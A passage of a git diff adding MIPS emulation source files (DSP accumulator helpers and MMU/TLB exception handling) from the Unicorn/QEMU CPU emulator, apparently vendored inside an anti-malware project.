MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + tempDL[0] += 1; + if (tempDL[0] == 0) { + tempDL[1] += 1; + } + tempI = tempDL[0] >> 1; + + if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + temp64 = tempDL[1] & 0x01; + if (temp64 == 0) { + tempI = 0x7FFFFFFF; + } else { + tempI = 0x80000000; + } + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)tempI; +} + +#if defined(TARGET_MIPS64) +target_ulong helper_dextr_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + + shift = shift & 0x3F; + + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + return (int64_t)(int32_t)(temp[0] >> 1); +} + +target_ulong helper_dextr_r_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + uint32_t temp128; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + return (int64_t)(int32_t)(temp[0] >> 1); +} + +target_ulong helper_dextr_rs_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + uint32_t temp128; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + if (temp128 == 0) { + temp[0] = 0x0FFFFFFFF; + } else { + temp[0] = 0x0100000000ULL; + } + set_DSPControl_overflow_flag(1, 23, env); + } + + return (int64_t)(int32_t)(temp[0] >> 1); +} + +target_ulong helper_dextr_l(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + target_ulong result; + + shift = shift & 0x3F; + + mipsdsp_rndrashift_acc(temp, ac, shift, env); + result = (temp[1] << 63) | (temp[0] >> 1); + + return result; +} + +target_ulong helper_dextr_r_l(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + uint32_t temp128; + target_ulong result; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + result = (temp[1] << 63) | (temp[0] >> 1); + + return result; +} + +target_ulong helper_dextr_rs_l(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + uint32_t temp128; + target_ulong result; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + if (temp128 == 0) { + temp[1] &= ~0x00ull - 1; + temp[0] |= ~0x00ull - 1; + } else { + temp[1] |= 0x01; + temp[0] &= 0x01; + } + set_DSPControl_overflow_flag(1, 23, env); + } + result = (temp[1] << 63) | (temp[0] >> 1); + + return result; +} +#endif + +target_ulong helper_extr_s_h(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int64_t temp, acc; + + shift = shift & 0x1F; + + acc = ((int64_t)env->active_tc.HI[ac] << 32) | + ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); + + temp = acc >> shift; + + if (temp > (int64_t)0x7FFF) { + temp = 0x00007FFF; + set_DSPControl_overflow_flag(1, 23, env); + } else if (temp < (int64_t)0xFFFFFFFFFFFF8000ULL) { + temp = 0xFFFF8000; + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)(int32_t)(temp & 0xFFFFFFFF); +} + + +#if defined(TARGET_MIPS64) +target_ulong helper_dextr_s_h(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int64_t temp[2]; + uint32_t temp127; + + shift = shift & 0x1F; + + mipsdsp_rashift_acc((uint64_t *)temp, ac, shift, env); + + temp127 = (temp[1] >> 63) & 0x01; + + if ((temp127 == 0) && (temp[1] > 0 || temp[0] > 32767)) { + temp[0] &= 0xFFFF0000; + temp[0] |= 0x00007FFF; + set_DSPControl_overflow_flag(1, 23, env); + } else if ((temp127 == 1) && + (temp[1] < 0xFFFFFFFFFFFFFFFFll + || temp[0] < 0xFFFFFFFFFFFF1000ll)) { + temp[0] &= 0xFFFF0000; + temp[0] |= 0x00008000; + set_DSPControl_overflow_flag(1, 23, env); + } + + return (int64_t)(int16_t)(temp[0] & MIPSDSP_LO); +} + +#endif + +target_ulong helper_extp(target_ulong ac, target_ulong size, CPUMIPSState *env) +{ + int32_t start_pos; + int sub; + uint32_t temp; + uint64_t acc; + + size = size & 0x1F; + + temp = 0; + start_pos = get_DSPControl_pos(env); + sub = start_pos - (size + 1); + if (sub >= -1) { + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); + temp = (acc >> (start_pos - size)) & (~0U >> (31 - size)); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return (target_ulong)temp; +} + +target_ulong helper_extpdp(target_ulong ac, target_ulong size, + CPUMIPSState *env) +{ + int32_t start_pos; + int sub; + uint32_t temp; + uint64_t acc; + + size = size & 0x1F; + temp = 0; + start_pos = get_DSPControl_pos(env); + sub = start_pos - (size + 1); + if (sub >= -1) { + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); + temp = extract64(acc, start_pos - size, size + 1); + + set_DSPControl_pos(sub, env); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return (target_ulong)temp; +} + + +#if defined(TARGET_MIPS64) +target_ulong helper_dextp(target_ulong ac, target_ulong size, CPUMIPSState *env) +{ + int start_pos; + int len; + int sub; + uint64_t tempB, tempA; + uint64_t temp; + + temp = 0; + + size = size & 0x3F; + start_pos = get_DSPControl_pos(env); + len = start_pos - size; + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + + sub = start_pos - (size + 1); + + if (sub >= -1) { + temp = (tempB << (64 - len)) | (tempA >> len); + temp = temp & ((0x01 << (size + 1)) - 1); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return temp; +} + +target_ulong helper_dextpdp(target_ulong ac, target_ulong size, + CPUMIPSState *env) +{ + int start_pos; + int len; + int sub; + uint64_t tempB, tempA; + uint64_t temp; + + temp = 0; + size = size & 0x3F; + start_pos = get_DSPControl_pos(env); + len = start_pos - size; + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + + sub = start_pos - (size + 1); + + if (sub >= -1) { + temp = (tempB << (64 - len)) | (tempA >> len); + temp = temp & ((0x01 << (size + 1)) - 1); + set_DSPControl_pos(sub, env); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return temp; +} + +#endif + +void helper_shilo(target_ulong ac, target_ulong rs, CPUMIPSState *env) +{ + int8_t rs5_0; + uint64_t temp, acc; + + rs5_0 = rs & 0x3F; + rs5_0 = (int8_t)(rs5_0 << 2) >> 2; + + if (unlikely(rs5_0 == 0)) { + return; + } + + acc = (((uint64_t)env->active_tc.HI[ac] << 32) & MIPSDSP_LHI) | + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); + + if (rs5_0 > 0) { + temp = acc >> rs5_0; + } else { + temp = acc << -rs5_0; + } + + env->active_tc.HI[ac] = (target_ulong)(int32_t)((temp & MIPSDSP_LHI) >> 32); + env->active_tc.LO[ac] = (target_ulong)(int32_t)(temp & MIPSDSP_LLO); +} + +#if defined(TARGET_MIPS64) +void helper_dshilo(target_ulong shift, target_ulong ac, CPUMIPSState *env) +{ + int8_t shift_t; + uint64_t tempB, tempA; + + shift_t = (int8_t)(shift << 1) >> 1; + + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + + if (shift_t != 0) { + if (shift_t >= 0) { + tempA = (tempB << (64 - shift_t)) | (tempA >> shift_t); + tempB = tempB >> shift_t; + } else { + shift_t = -shift_t; + tempB = (tempB << shift_t) | (tempA >> (64 - shift_t)); + tempA = tempA << shift_t; + } + } + + env->active_tc.HI[ac] = tempB; + env->active_tc.LO[ac] = tempA; +} + +#endif +void helper_mthlip(target_ulong ac, target_ulong rs, CPUMIPSState *env) +{ + int32_t tempA, tempB, pos; + + tempA = rs; + tempB = env->active_tc.LO[ac]; + env->active_tc.HI[ac] = (target_long)tempB; + env->active_tc.LO[ac] = (target_long)tempA; + pos = get_DSPControl_pos(env); + + if (pos > 32) { + return; + } else { + set_DSPControl_pos(pos + 32, env); + } +} + +#if defined(TARGET_MIPS64) +void helper_dmthlip(target_ulong rs, target_ulong ac, CPUMIPSState *env) +{ + uint8_t ac_t; + uint8_t pos; + uint64_t tempB, tempA; + + ac_t = ac & 0x3; + + tempA = rs; + tempB = env->active_tc.LO[ac_t]; + + env->active_tc.HI[ac_t] = tempB; + env->active_tc.LO[ac_t] = tempA; + + pos = get_DSPControl_pos(env); + + if (pos <= 64) { + pos = pos + 64; + set_DSPControl_pos(pos, env); + } +} +#endif + +void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env) +{ + uint8_t mask[6]; + uint8_t i; + uint32_t newbits, overwrite; + target_ulong dsp; + + newbits = 0x00; + overwrite = 0xFFFFFFFF; + dsp = env->active_tc.DSPControl; + + for (i = 0; i < 6; i++) { + mask[i] = (mask_num >> i) & 0x01; + } + + if (mask[0] == 1) { +#if defined(TARGET_MIPS64) + overwrite &= 0xFFFFFF80; + newbits &= 0xFFFFFF80; + newbits |= 0x0000007F & rs; +#else + overwrite &= 0xFFFFFFC0; + newbits &= 0xFFFFFFC0; + newbits |= 0x0000003F & rs; +#endif + } + + if (mask[1] == 1) { + overwrite &= 0xFFFFE07F; + newbits &= 0xFFFFE07F; + newbits |= 0x00001F80 & rs; + } + + if (mask[2] == 1) { + overwrite &= 0xFFFFDFFF; + newbits &= 0xFFFFDFFF; + newbits |= 0x00002000 & rs; + } + + if (mask[3] == 1) { + overwrite &= 0xFF00FFFF; + newbits &= 0xFF00FFFF; + newbits |= 0x00FF0000 & rs; + } + + if (mask[4] == 1) { + overwrite &= 0x00FFFFFF; + newbits &= 0x00FFFFFF; +#if defined(TARGET_MIPS64) + newbits |= 0xFF000000 & rs; +#else + newbits |= 0x0F000000 & rs; +#endif + } + + if (mask[5] == 1) { + overwrite &= 0xFFFFBFFF; + newbits &= 0xFFFFBFFF; + newbits |= 0x00004000 & rs; + } + + dsp = dsp & overwrite; + dsp = dsp | newbits; + env->active_tc.DSPControl = dsp; +} + +void helper_wrdsp(target_ulong rs, target_ulong mask_num, CPUMIPSState *env) +{ + cpu_wrdsp(rs, mask_num, env); +} + +uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env) +{ + uint8_t mask[6]; + uint32_t ruler, i; + target_ulong temp; + target_ulong dsp; + + ruler = 0x01; + for (i = 0; i < 6; i++) { + mask[i] = (mask_num & ruler) >> i ; + ruler = ruler << 1; + } + + temp = 0x00; + dsp = env->active_tc.DSPControl; + + if (mask[0] == 1) { +#if defined(TARGET_MIPS64) + temp |= dsp & 0x7F; +#else + temp |= dsp & 0x3F; +#endif + } + + if (mask[1] == 1) { + temp |= dsp & 0x1F80; + } + + if (mask[2] == 1) { + temp |= dsp & 0x2000; + } + + if (mask[3] == 1) { + temp |= dsp & 0x00FF0000; + } + + if (mask[4] == 1) { +#if defined(TARGET_MIPS64) + temp |= dsp & 0xFF000000; +#else + temp |= dsp & 0x0F000000; +#endif + } + + if (mask[5] == 1) { + temp |= dsp & 0x4000; + } + + return temp; +} + +target_ulong helper_rddsp(target_ulong mask_num, CPUMIPSState *env) +{ + return cpu_rddsp(mask_num, env); +} + + +#undef MIPSDSP_LHI +#undef MIPSDSP_LLO +#undef MIPSDSP_HI +#undef MIPSDSP_LO +#undef MIPSDSP_Q3 +#undef MIPSDSP_Q2 +#undef MIPSDSP_Q1 +#undef MIPSDSP_Q0 + +#undef MIPSDSP_SPLIT32_8 +#undef MIPSDSP_SPLIT32_16 + +#undef MIPSDSP_RETURN32_8 +#undef MIPSDSP_RETURN32_16 + +#ifdef TARGET_MIPS64 +#undef MIPSDSP_SPLIT64_16 +#undef MIPSDSP_SPLIT64_32 +#undef MIPSDSP_RETURN64_16 +#undef MIPSDSP_RETURN64_32 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.c new file mode 100644 index 0000000..749584c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.c @@ -0,0 +1,826 @@ +/* + * MIPS emulation helpers for qemu. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include +#include +#include +#include "unicorn/platform.h" +#include + +#include "cpu.h" +#include "exec/cpu_ldst.h" + +enum { + TLBRET_XI = -6, + TLBRET_RI = -5, + TLBRET_DIRTY = -4, + TLBRET_INVALID = -3, + TLBRET_NOMATCH = -2, + TLBRET_BADADDR = -1, + TLBRET_MATCH = 0 +}; + +#if !defined(CONFIG_USER_ONLY) + +/* no MMU emulation */ +int no_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type) +{ + *physical = address; + *prot = PAGE_READ | PAGE_WRITE; + return TLBRET_MATCH; +} + +/* fixed mapping MMU emulation */ +int fixed_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type) +{ + if (address <= (int32_t)0x7FFFFFFFUL) { + if (!(env->CP0_Status & (1 << CP0St_ERL))) + *physical = address + 0x40000000UL; + else + *physical = address; + } else if (address <= (int32_t)0xBFFFFFFFUL) + *physical = address & 0x1FFFFFFF; + else + *physical = address; + + *prot = PAGE_READ | PAGE_WRITE; + return TLBRET_MATCH; +} + +/* MIPS32/MIPS64 R4000-style MMU emulation */ +int r4k_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type) +{ + uint8_t ASID = env->CP0_EntryHi & 0xFF; + int i; + + for (i = 0; i < env->tlb->tlb_in_use; i++) { + r4k_tlb_t *tlb = &env->tlb->mmu.r4k.tlb[i]; + /* 1k pages are not supported. */ + target_ulong mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + target_ulong tag = address & ~mask; + target_ulong VPN = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + tag &= env->SEGMask; +#endif + + /* Check ASID, virtual page number & size */ + if ((tlb->G == 1 || tlb->ASID == ASID) && VPN == tag && !tlb->EHINV) { + /* TLB match */ + int n = !!(address & mask & ~(mask >> 1)); + /* Check access rights */ + if (!(n ? tlb->V1 : tlb->V0)) { + return TLBRET_INVALID; + } + if (rw == MMU_INST_FETCH && (n ? tlb->XI1 : tlb->XI0)) { + return TLBRET_XI; + } + if (rw == MMU_DATA_LOAD && (n ? tlb->RI1 : tlb->RI0)) { + return TLBRET_RI; + } + if (rw != MMU_DATA_STORE || (n ? tlb->D1 : tlb->D0)) { + *physical = tlb->PFN[n] | (address & (mask >> 1)); + *prot = PAGE_READ; + if (n ? tlb->D1 : tlb->D0) + *prot |= PAGE_WRITE; + return TLBRET_MATCH; + } + return TLBRET_DIRTY; + } + } + return TLBRET_NOMATCH; +} + +static int get_physical_address (CPUMIPSState *env, hwaddr *physical, + int *prot, target_ulong real_address, + int rw, int access_type) +{ + /* User mode can only access useg/xuseg */ + int user_mode = (env->hflags & MIPS_HFLAG_MODE) == MIPS_HFLAG_UM; + int supervisor_mode = (env->hflags & MIPS_HFLAG_MODE) == MIPS_HFLAG_SM; + int kernel_mode = !user_mode && !supervisor_mode; +#if defined(TARGET_MIPS64) + int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; + int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; + int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; +#endif + int ret = TLBRET_MATCH; + /* effective address (modified for KVM T&E kernel segments) */ + target_ulong address = real_address; + +#if 0 + qemu_log("user mode %d h %08x\n", user_mode, env->hflags); +#endif + +#define USEG_LIMIT 0x7FFFFFFFUL +#define KSEG0_BASE 0x80000000UL +#define KSEG1_BASE 0xA0000000UL +#define KSEG2_BASE 0xC0000000UL +#define KSEG3_BASE 0xE0000000UL + +#define KVM_KSEG0_BASE 0x40000000UL +#define KVM_KSEG2_BASE 0x60000000UL + + if (address <= USEG_LIMIT) { + /* useg */ + if (env->CP0_Status & (1 << CP0St_ERL)) { + *physical = address & 0xFFFFFFFF; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } +#if defined(TARGET_MIPS64) + } else if (address < 0x4000000000000000ULL) { + /* xuseg */ + if (UX && address <= (0x3FFFFFFFFFFFFFFFULL & env->SEGMask)) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } else if (address < 0x8000000000000000ULL) { + /* xsseg */ + if ((supervisor_mode || kernel_mode) && + SX && address <= (0x7FFFFFFFFFFFFFFFULL & env->SEGMask)) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } else if (address < 0xC000000000000000ULL) { + /* xkphys */ + if (kernel_mode && KX && + (address & 0x07FFFFFFFFFFFFFFULL) <= env->PAMask) { + *physical = address & env->PAMask; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = TLBRET_BADADDR; + } + } else if (address < 0xFFFFFFFF80000000ULL) { + /* xkseg */ + if (kernel_mode && KX && + address <= (0xFFFFFFFF7FFFFFFFULL & env->SEGMask)) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } +#endif + } else if (address < (int32_t)KSEG1_BASE) { + /* kseg0 */ + if (kernel_mode) { + *physical = address - (int32_t)KSEG0_BASE; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = TLBRET_BADADDR; + } + } else if (address < (int32_t)KSEG2_BASE) { + /* kseg1 */ + if (kernel_mode) { + *physical = address - (int32_t)KSEG1_BASE; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = TLBRET_BADADDR; + } + } else if (address < (int32_t)KSEG3_BASE) { + /* sseg (kseg2) */ + if (supervisor_mode || kernel_mode) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } else { + /* kseg3 */ + /* XXX: debug segment is not emulated */ + if (kernel_mode) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } +#if 0 + qemu_log(TARGET_FMT_lx " %d %d => %" HWADDR_PRIx " %d (%d)\n", + address, rw, access_type, *physical, *prot, ret); +#endif + + return ret; +} +#endif + +static void raise_mmu_exception(CPUMIPSState *env, target_ulong address, + int rw, int tlb_error) +{ + CPUState *cs = CPU(mips_env_get_cpu(env)); + int exception = 0, error_code = 0; + + if (rw == MMU_INST_FETCH) { + error_code |= EXCP_INST_NOTAVAIL; + } + + switch (tlb_error) { + default: + case TLBRET_BADADDR: + /* Reference to kernel address from user mode or supervisor mode */ + /* Reference to supervisor address from user mode */ + if (rw == MMU_DATA_STORE) { + exception = EXCP_AdES; + } else { + exception = EXCP_AdEL; + } + break; + case TLBRET_NOMATCH: + /* No TLB match for a mapped address */ + if (rw == MMU_DATA_STORE) { + exception = EXCP_TLBS; + } else { + exception = EXCP_TLBL; + } + error_code |= EXCP_TLB_NOMATCH; + break; + case TLBRET_INVALID: + /* TLB match with no valid bit */ + if (rw == MMU_DATA_STORE) { + exception = EXCP_TLBS; + } else { + exception = EXCP_TLBL; + } + break; + case TLBRET_DIRTY: + /* TLB match but 'D' bit is cleared */ + exception = EXCP_LTLBL; + break; + case TLBRET_XI: + /* Execute-Inhibit Exception */ + if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { + exception = EXCP_TLBXI; + } else { + exception = EXCP_TLBL; + } + break; + case TLBRET_RI: + /* Read-Inhibit Exception */ + if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { + exception = EXCP_TLBRI; + } else { + exception = EXCP_TLBL; + } + break; + } + /* Raise exception */ + env->CP0_BadVAddr = address; + env->CP0_Context = (env->CP0_Context & ~0x007fffff) | + ((address >> 9) & 0x007ffff0); + env->CP0_EntryHi = + (env->CP0_EntryHi & 0xFF) | (address & (((unsigned int)TARGET_PAGE_MASK) << 1)); +#if defined(TARGET_MIPS64) + env->CP0_EntryHi &= env->SEGMask; + env->CP0_XContext = (env->CP0_XContext & ((~0ULL) << (env->SEGBITS - 7))) | + ((address & 0xC00000000000ULL) >> (55 - env->SEGBITS)) | + ((address & ((1ULL << env->SEGBITS) - 1) & 0xFFFFFFFFFFFFE000ULL) >> 9); +#endif + cs->exception_index = exception; + env->error_code = error_code; +} + +#if !defined(CONFIG_USER_ONLY) +hwaddr mips_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + hwaddr phys_addr; + int prot; + + if (get_physical_address(&cpu->env, &phys_addr, &prot, addr, 0, + ACCESS_INT) != 0) { + return -1; + } + return phys_addr; +} +#endif + +int mips_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; +#if !defined(CONFIG_USER_ONLY) + hwaddr physical; + int prot; + int access_type; +#endif + int ret = 0; + +#if 0 + log_cpu_state(cs, 0); +#endif + qemu_log("%s pc " TARGET_FMT_lx " ad %" VADDR_PRIx " rw %d mmu_idx %d\n", + __func__, env->active_tc.PC, address, rw, mmu_idx); + + /* data access */ +#if !defined(CONFIG_USER_ONLY) + /* XXX: put correct access by using cpu_restore_state() + correctly */ + access_type = ACCESS_INT; + ret = get_physical_address(env, &physical, &prot, + address, rw, access_type); + qemu_log("%s address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx + " prot %d\n", + __func__, address, ret, physical, prot); + if (ret == TLBRET_MATCH) { + if (mmu_idx < 0 || mmu_idx >= NB_MMU_MODES) { + raise_mmu_exception(env, address, rw, ret); + ret = 1; + } else { + tlb_set_page(cs, address & TARGET_PAGE_MASK, + physical & TARGET_PAGE_MASK, prot | PAGE_EXEC, + mmu_idx, TARGET_PAGE_SIZE); + ret = 0; + } + } else if (ret < 0) +#endif + { + raise_mmu_exception(env, address, rw, ret); + ret = 1; + } + + return ret; +} + +#if !defined(CONFIG_USER_ONLY) +hwaddr cpu_mips_translate_address(CPUMIPSState *env, target_ulong address, int rw) +{ + hwaddr physical; + int prot; + int access_type; + int ret = 0; + + /* data access */ + access_type = ACCESS_INT; + ret = get_physical_address(env, &physical, &prot, + address, rw, access_type); + if (ret != TLBRET_MATCH) { + raise_mmu_exception(env, address, rw, ret); + return -1LL; + } else { + return physical; + } +} +#endif + +static const char * const excp_names[EXCP_LAST + 1] = { + "reset", + "soft reset", + "debug single step", + "debug interrupt", + "debug data break load", + "debug data break store", + "non-maskable interrupt", + "machine check", + "interrupt", + "deferred watchpoint", + "debug instruction breakpoint", + "instruction fetch watchpoint", + "address error load", + "address error store", + "TLB refill", + "instruction bus error", + "debug breakpoint", + "syscall", + "break", + "coprocessor unusable", + "reserved instruction", + "arithmetic overflow", + "trap", + "floating point", + "data watchpoint", + "TLB modify", + "TLB load", + "TLB store", + "data bus error", + "thread", + "MDMX", + "precise coprocessor 2", + "cache error", + "DSP disabled", + "MSA disabled", + "MSA floating point", + "TLB execute-inhibit", + "TLB read-inhibit", +}; + +target_ulong exception_resume_pc (CPUMIPSState *env) +{ + target_ulong bad_pc; + target_ulong isa_mode; + + isa_mode = !!(env->hflags & MIPS_HFLAG_M16); + bad_pc = env->active_tc.PC | isa_mode; + if (env->hflags & MIPS_HFLAG_BMASK) { + /* If the exception was raised from a delay slot, come back to + the jump. */ + bad_pc -= (env->hflags & MIPS_HFLAG_B16 ? 2 : 4); + } + + return bad_pc; +} + +#if !defined(CONFIG_USER_ONLY) +static void set_hflags_for_handler (CPUMIPSState *env) +{ + /* Exception handlers are entered in 32-bit mode. */ + env->hflags &= ~(MIPS_HFLAG_M16); + /* ...except that microMIPS lets you choose. */ + if (env->insn_flags & ASE_MICROMIPS) { + env->hflags |= (!!(env->CP0_Config3 + & (1 << CP0C3_ISA_ON_EXC)) + << MIPS_HFLAG_M16_SHIFT); + } +} + +static inline void set_badinstr_registers(CPUMIPSState *env) +{ + if (env->hflags & MIPS_HFLAG_M16) { + /* TODO: add BadInstr support for microMIPS */ + return; + } + if (env->CP0_Config3 & (1 << CP0C3_BI)) { + env->CP0_BadInstr = cpu_ldl_code(env, env->active_tc.PC); + } + if ((env->CP0_Config3 & (1 << CP0C3_BP)) && + (env->hflags & MIPS_HFLAG_BMASK)) { + env->CP0_BadInstrP = cpu_ldl_code(env, env->active_tc.PC - 4); + } +} +#endif + +void mips_cpu_do_interrupt(CPUState *cs) +{ +#if !defined(CONFIG_USER_ONLY) + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + bool update_badinstr = 0; + target_ulong offset; + int cause = -1; + const char *name; + + if (qemu_log_enabled() && cs->exception_index != EXCP_EXT_INTERRUPT) { + if (cs->exception_index < 0 || cs->exception_index > EXCP_LAST) { + name = "unknown"; + } else { + name = excp_names[cs->exception_index]; + } + + qemu_log("%s enter: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " %s exception\n", + __func__, env->active_tc.PC, env->CP0_EPC, name); + } + if (cs->exception_index == EXCP_EXT_INTERRUPT && + (env->hflags & MIPS_HFLAG_DM)) { + cs->exception_index = EXCP_DINT; + } + offset = 0x180; + switch (cs->exception_index) { + case EXCP_DSS: + env->CP0_Debug |= 1 << CP0DB_DSS; + /* Debug single step cannot be raised inside a delay slot and + resume will always occur on the next instruction + (but we assume the pc has always been updated during + code translation). */ + env->CP0_DEPC = env->active_tc.PC | !!(env->hflags & MIPS_HFLAG_M16); + goto enter_debug_mode; + case EXCP_DINT: + env->CP0_Debug |= 1 << CP0DB_DINT; + goto set_DEPC; + case EXCP_DIB: + env->CP0_Debug |= 1 << CP0DB_DIB; + goto set_DEPC; + case EXCP_DBp: + env->CP0_Debug |= 1 << CP0DB_DBp; + goto set_DEPC; + case EXCP_DDBS: + env->CP0_Debug |= 1 << CP0DB_DDBS; + goto set_DEPC; + case EXCP_DDBL: + env->CP0_Debug |= 1 << CP0DB_DDBL; + set_DEPC: + env->CP0_DEPC = exception_resume_pc(env); + env->hflags &= ~MIPS_HFLAG_BMASK; + enter_debug_mode: + env->hflags |= MIPS_HFLAG_DM | MIPS_HFLAG_64 | MIPS_HFLAG_CP0; + env->hflags &= ~(MIPS_HFLAG_KSU); + /* EJTAG probe trap enable is not implemented... */ + if (!(env->CP0_Status & (1 << CP0St_EXL))) + env->CP0_Cause &= ~(1U << CP0Ca_BD); + env->active_tc.PC = (int32_t)0xBFC00480; + set_hflags_for_handler(env); + break; + case EXCP_RESET: + cpu_reset(CPU(cpu)); + break; + case EXCP_SRESET: + env->CP0_Status |= (1 << CP0St_SR); + /* memset CP0_WatchLo which is fixed size array. */ + memset(env->CP0_WatchLo, 0, sizeof(env->CP0_WatchLo)); + goto set_error_EPC; + case EXCP_NMI: + env->CP0_Status |= (1 << CP0St_NMI); + set_error_EPC: + env->CP0_ErrorEPC = exception_resume_pc(env); + env->hflags &= ~MIPS_HFLAG_BMASK; + env->CP0_Status |= (1 << CP0St_ERL) | (1 << CP0St_BEV); + env->hflags |= MIPS_HFLAG_64 | MIPS_HFLAG_CP0; + env->hflags &= ~(MIPS_HFLAG_KSU); + if (!(env->CP0_Status & (1 << CP0St_EXL))) + env->CP0_Cause &= ~(1U << CP0Ca_BD); + env->active_tc.PC = (int32_t)0xBFC00000; + set_hflags_for_handler(env); + break; + case EXCP_EXT_INTERRUPT: + cause = 0; + if (env->CP0_Cause & (1 << CP0Ca_IV)) + offset = 0x200; + + if (env->CP0_Config3 & ((1 << CP0C3_VInt) | (1 << CP0C3_VEIC))) { + /* Vectored Interrupts. */ + unsigned int spacing; + unsigned int vector; + unsigned int pending = (env->CP0_Cause & CP0Ca_IP_mask) >> 8; + + pending &= 